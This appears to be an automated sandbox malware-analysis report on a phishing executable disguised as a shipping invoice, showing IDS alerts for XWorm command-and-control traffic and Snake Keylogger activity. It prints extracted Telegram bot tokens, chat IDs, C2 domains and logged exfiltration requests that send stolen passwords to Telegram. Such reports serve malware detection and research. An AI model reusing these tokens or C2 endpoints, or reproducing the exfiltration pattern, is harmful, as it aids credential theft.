2025-02-04T15:28:54.597949+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:55.447434+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:00.784858+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:00.912765+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:01.040636+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:03.503467+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:06.366297+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:11.768928+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:24.101599+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:32.880717+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:32.993365+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:33.148464+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:35.299890+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:35.743497+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:29:48.051235+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:00.368806+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:12.704939+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:17.817722+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:18.915487+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:19.040889+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:24.401607+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:29.956450+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:42.268856+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:52.003181+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:52.404149+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:30:54.898198+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:31:01.404946+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:31:08.113250+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:31:09.610771+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:31:26.408860+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:49.578064+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:19.509061+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:49.501033+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:19.497621+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:49.505340+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:19.505409+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:49.502416+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:19.554260+0100	2852874	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:29:11.546059+0100	2853193	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:45.715560+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49818	149.154.167.220	443	TCP
2025-02-04T15:27:47.383529+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49831	149.154.167.220	443	TCP
2025-02-04T15:27:53.781453+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49872	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendMessage?chat_id=6009622255", "Token": "7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI", "Chat_id": "6009622255", "Version": "5.1"}
Source: ungagCKiEnZdl.exe.7644.28.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: SCS AWB and Commercial Invoice.exe	ReversingLabs: Detection: 47%
Source: SCS AWB and Commercial Invoice.exe	Virustotal: Detection: 40%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SCS AWB and Commercial Invoice.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bin12.ydns.eu,bin14.ydns.eu,kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu
Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 3908
Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.3
Source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SCS AWB and Commercial Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49749 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49872 version: TLS 1.2

Source: SCS AWB and Commercial Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ALQQ.pdb source: bxhciy.exe, 0000000F.00000000.2162072549.0000000000B32000.00000002.00000001.01000000.0000000D.sdmp, ungagCKiEnZdl.exe.15.dr, bxhciy.exe.9.dr
Source:	Binary string: ALQQ.pdbSHA256 source: bxhciy.exe, 0000000F.00000000.2162072549.0000000000B32000.00000002.00000001.01000000.0000000D.sdmp, ungagCKiEnZdl.exe.15.dr, bxhciy.exe.9.dr
Source:	Binary string: mQns.pdb source: SCS AWB and Commercial Invoice.exe, HOYVjVj.exe.0.dr
Source:	Binary string: mQns.pdbSHA256 source: SCS AWB and Commercial Invoice.exe, HOYVjVj.exe.0.dr

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 4x nop then jmp 02B3D287h	0_2_02B3D387
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 4x nop then jmp 02B3D287h	0_2_02B3D40D
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 4x nop then jmp 053CC55Fh	10_2_053CC65F
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 4x nop then jmp 053CC55Fh	10_2_053CC6E5
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF848859B8Dh	16_2_00007FF84885992C
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF84885A180h	16_2_00007FF84885992C
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF848857544h	16_2_00007FF84885733F
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF848857F85h	16_2_00007FF84885733F
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF8488587CDh	16_2_00007FF8488584C8
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 4x nop then jmp 00007FF84885A180h	16_2_00007FF84885A09C
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF84884A180h	23_2_00007FF848849D9D
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF8488487CDh	23_2_00007FF8488482FB
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF848847544h	23_2_00007FF848847336
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF848847F85h	23_2_00007FF848847336
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF848849B8Dh	23_2_00007FF848849872
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF848848CBDh	23_2_00007FF8488489A2
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF84884969Dh	23_2_00007FF848849382
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 4x nop then jmp 00007FF84884A180h	23_2_00007FF84884A09C
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF84886A180h	28_2_00007FF848869D9D
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF8488687CDh	28_2_00007FF8488682FB
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF848867544h	28_2_00007FF848867336
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF848867F85h	28_2_00007FF848867336
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF848869B8Dh	28_2_00007FF848869872
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF848868CBDh	28_2_00007FF8488689A2
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF84886969Dh	28_2_00007FF848869382
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 4x nop then jmp 00007FF84886A180h	28_2_00007FF84886A09C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 45.144.214.104:3908
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.144.214.104:3908 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49709 -> 45.144.214.104:3908
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.144.214.104:3908 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 45.144.214.104:3908
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49872 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49872 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49818 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49818 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49831 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49831 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:49709 -> 45.144.214.104:3908

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot7605720342:AAEvFhVZXgNZX-Y_OQTATaG7Q9Glh4EocyI/sendDocument?chat_id=6009622255&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd45a925b30a48Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendDocument?chat_id=6009622255&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd45aa8cd89ad9Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendDocument?chat_id=6009622255&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd45a69401d7adHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49766 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49739 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49811 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49756 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49762 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49749 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
